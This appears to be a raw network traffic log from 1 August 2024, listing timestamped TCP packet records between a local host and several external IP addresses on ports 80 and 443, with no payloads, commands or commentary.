                                                                  Aug 1, 2024 04:28:08.871373892 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871402979 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871428013 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871445894 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871475935 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871491909 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871525049 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871536970 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871573925 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871573925 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871596098 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871614933 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871628046 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871643066 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871682882 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871701956 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.871731997 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871761084 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871802092 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871803045 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871834993 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871862888 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871901035 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871931076 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871946096 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871970892 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.871999025 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872031927 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872062922 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872092009 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872117996 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872150898 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872150898 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.872196913 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.881076097 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.881339073 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.881424904 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.881484985 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.881566048 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.881576061 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.881613016 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:08.881629944 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:08.881707907 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:09.524210930 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:09.524545908 CEST44349747162.159.136.232192.168.2.4
                                                                  Aug 1, 2024 04:28:09.524616957 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:09.530035973 CEST49747443192.168.2.4162.159.136.232
                                                                  Aug 1, 2024 04:28:09.817109108 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:09.817193985 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:09.817285061 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:09.840555906 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:09.840635061 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.463857889 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.467688084 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.467756033 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.469317913 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.469527960 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.474205017 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.474340916 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.477046013 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.477111101 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.477194071 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.477252007 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.479130030 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.479234934 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.483309031 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.483412027 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.487157106 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.487238884 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488209009 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488267899 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488328934 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488351107 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488393068 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488415003 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488507032 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488559008 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488611937 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488611937 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488640070 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488651991 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488652945 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488677025 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488692045 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488742113 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488768101 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488786936 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488816977 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488831997 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488878965 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488878965 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488905907 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488924980 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.488956928 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.488977909 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.489001989 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489017010 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.489054918 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489070892 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.489100933 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489119053 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489136934 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489171982 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489203930 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489234924 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.489893913 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.500004053 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500066996 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.500133038 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500157118 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.500197887 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500214100 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.500243902 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500269890 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.500304937 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500328064 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500351906 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500381947 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500416040 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.500456095 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.502897978 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.510441065 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.510505915 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.510565042 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.510615110 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.510648966 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.510678053 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.510807037 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.511127949 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511193991 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.511243105 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511274099 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.511301041 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511322975 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.511363983 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511398077 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511405945 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.511432886 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511459112 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:10.511465073 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:10.511550903 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:11.371448994 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:11.371499062 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:11.371714115 CEST44349748149.154.167.220192.168.2.4
                                                                  Aug 1, 2024 04:28:11.371782064 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:11.371782064 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:11.390058994 CEST49748443192.168.2.4149.154.167.220
                                                                  Aug 1, 2024 04:28:11.636169910 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:11.641998053 CEST8049744208.95.112.1192.168.2.4
                                                                  Aug 1, 2024 04:28:11.642066002 CEST4974480192.168.2.4208.95.112.1
                                                                  Aug 1, 2024 04:28:12.560339928 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:12.560394049 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:12.735501051 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:12.735558987 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.091180086 CEST4974580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.091456890 CEST4974680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.096303940 CEST8049745194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:13.096369028 CEST8049746194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:13.115895987 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.121077061 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:13.121269941 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.121543884 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.126532078 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:13.475258112 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:13.596060991 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:13.596101999 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:13.925272942 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:14.057415009 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:14.057527065 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:18.941665888 CEST8049749194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:18.941780090 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:18.944169998 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:18.948889017 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:18.948951960 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:18.950993061 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:18.955724955 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:19.741637945 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:19.955862999 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:19.956641912 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:19.956733942 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:20.653506994 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:20.658615112 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:20.658679008 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:20.658708096 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:20.841118097 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:20.846200943 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:20.846286058 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:20.849490881 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:20.854562998 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:20.925170898 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.140621901 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.140693903 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.206998110 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.212064981 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.212649107 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.322640896 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.328264952 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.328330040 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.328598976 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.333777905 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.410511971 CEST4974980192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.651439905 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.674571991 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.679770947 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.679800987 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.680022001 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.793061972 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:21.793240070 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:21.864744902 CEST4974180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:22.142247915 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:22.252618074 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:22.277003050 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:22.455749989 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.019228935 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.019262075 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.022075891 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.022353888 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.024996996 CEST8049750194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.025070906 CEST4975080192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.025568008 CEST8049752194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.025615931 CEST4975280192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.027369976 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.027436018 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.027564049 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.027757883 CEST8049751194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.027801991 CEST4975180192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.032634974 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.395833969 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401324034 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401360989 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401392937 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401396990 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401421070 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401439905 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401447058 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401468992 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401473045 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401499987 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401525974 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401525974 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401551962 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401582003 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401583910 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.401612043 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.401639938 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.406395912 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.406544924 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.406790018 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.406816959 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.406841993 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.406871080 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.406898022 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.406925917 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.406970978 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.448827028 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.451584101 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.496787071 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.499650955 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.548762083 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.551369905 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.561357021 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.563244104 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.568522930 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568555117 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568582058 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568614006 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568640947 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568666935 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568694115 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568742037 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.568924904 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.569381952 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.569412947 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.569439888 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.684272051 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.689492941 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.690957069 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.691045046 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.695976019 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.722191095 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:25.727494955 CEST8049753194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:25.729402065 CEST4975380192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:26.052145004 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:26.057084084 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:26.060154915 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:26.060168982 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:26.481410027 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:26.615425110 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:26.616899967 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.562093973 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.562464952 CEST4975580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.567363024 CEST8049755194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:27.567440033 CEST4975580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.567828894 CEST4975580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.567851067 CEST8049754194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:27.567912102 CEST4975480192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.573045969 CEST8049755194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:27.602416992 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.607868910 CEST4975580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.608571053 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:27.608660936 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.608748913 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:27.613635063 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:27.656797886 CEST8049755194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:27.955836058 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:28.176361084 CEST8049755194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:28.176565886 CEST4975580192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:28.177253008 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:28.177311897 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:28.177339077 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:28.414266109 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:28.547703028 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:28.547945976 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.030494928 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.030890942 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.037508965 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:29.037610054 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.038067102 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.038116932 CEST8049756194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:29.038182020 CEST4975680192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.050622940 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:29.393357992 CEST4975780192.168.2.4194.58.42.154
                                                                  Aug 1, 2024 04:28:29.399122000 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:29.399204969 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:29.399235010 CEST8049757194.58.42.154192.168.2.4
                                                                  Aug 1, 2024 04:28:29.859499931 CEST8049757194.58.42.154192.168.2.4
